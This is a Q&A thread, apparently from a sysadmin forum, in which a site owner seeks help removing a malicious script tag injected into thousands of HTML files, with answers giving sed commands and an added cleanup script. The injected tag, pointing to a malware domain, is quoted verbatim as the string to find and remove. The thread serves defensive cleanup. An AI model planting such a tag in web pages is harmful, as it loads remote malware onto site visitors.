0

My server was infected this week, and the attacker ran a script that injected a script in several files, and now my domain is blacklisted on Google.

The code injected was this:

<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>

Careful! It's malware!

So, I ran this command (it's a Linux server):

grep -r "sexfromindia.com" /home/mydomain/public_html/

And this command returned 9941 files :/

I would like to run a script that will search for <script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script> and replace it with "  " (double spaces). Since all the infected files are .html, the double spaces will not harm anything.

Now, not all the files are infected, only 9941 (about 50%).

How should I clean this mess? Should I use awk, sed, grep, perl? Can anyone give me examples?

Thanks.

2 Answers

1

I would be tempted to take more drastic measures in case something more devious was also done.

That said, seems like sed is the way to go on this one. Here is an example of searching for text and replacing the entire line: Replace whole line containing a string using Sed.

You will probably want to test your script on a few files, and back everything up before you start making changes.

superdesk
1

You can use a sed script and the command:

sed -i.bak -f script.sed file[s]

script.sed

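# Replace the injected tag with two spaces, as asked in the question.
# "#" is the s-command delimiter, so the slashes in the URL need no escaping.
s#<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>#  #g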

-i for in-place-editing with a backup.

Endoro
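An added example, not part of either answer: one way to combine the `grep -r` search from the question with the `sed -i.bak` replacement across a whole tree, then verify what is left. The function names, the constructed sample files and the placeholder host `malicious.example` are assumptions; it relies on a grep that supports `-r`, `--include` and `--null`.

```shell
#!/bin/sh
# clean_injected DIR HOST
# Replaces every <script ... src="http://HOST/..."></script> tag in *.html
# files under DIR with two spaces, keeping a .bak copy of each edited file.
# Prints "<files cleaned> <files still mentioning HOST>".
clean_injected() {
    dir=$1 host=$2
    # Escape dots so the host is matched literally (assumes a plain hostname).
    host_re=$(printf '%s' "$host" | sed 's/\./\\./g')
    # Any script tag whose src points at the host, whatever its other attributes.
    tag_re="<script[^>]*src=\"http://${host_re}/[^\"]*\"[^>]*></script>"
    found=$(grep -rlF --include='*.html' -- "$host" "$dir" | wc -l)
    if [ "$found" -gt 0 ]; then
        # NUL-separated names survive spaces in file names.
        grep -rlF --null --include='*.html' -- "$host" "$dir" |
            xargs -0 sed -i.bak -e "s#${tag_re}#  #g"
    fi
    # Verify: anything still mentioning the host needs manual review.
    left=$(grep -rlF --include='*.html' -- "$host" "$dir" | wc -l)
    echo "$((found - left)) $((left))"
}

# Constructed sample tree for a dry run; prints the temporary directory path.
make_sample() {
    d=$(mktemp -d)
    tag='<script language="JavaScript" src="http://malicious.example/x/lib.min.js" type="text/javascript"></script>'
    printf '<html>%s<p>hi</p></html>\n' "$tag" > "$d/index.html"
    printf '<body>\n%s\n</body>\n' "$tag" > "$d/my page.html"
    printf '<p>clean</p>\n' > "$d/clean.html"
    # Mentions the host in a different form, so the tag pattern will not match it.
    printf '<a href="http://malicious.example/">odd</a>\n' > "$d/other.html"
    echo "$d"
}

# Usage: d=$(make_sample); clean_injected "$d" malicious.example   # prints "2 1"
```

The `.bak` copies still contain the injected tag, so move them out of the web root once the cleaned files have been checked. A non-zero second number means some files mention the host in a form the tag pattern did not match.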